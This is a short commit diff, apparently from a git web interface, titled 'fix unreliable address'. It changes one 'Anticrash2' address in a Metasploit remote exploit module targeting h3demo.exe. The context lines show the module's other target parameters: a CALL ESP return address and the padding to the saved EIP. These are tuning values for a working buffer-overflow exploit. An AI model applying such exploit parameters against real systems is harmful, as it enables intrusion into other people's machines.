fix unreliable address
parent
908d6f946f
commit
7af83a112d
|
@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
|
||||
'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
|
||||
# Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
|
||||
'Anticrash2' => 0x001899A8,
|
||||
'Anticrash2' => 0x005CE200,
|
||||
'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
|
||||
'Padding' => 109 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue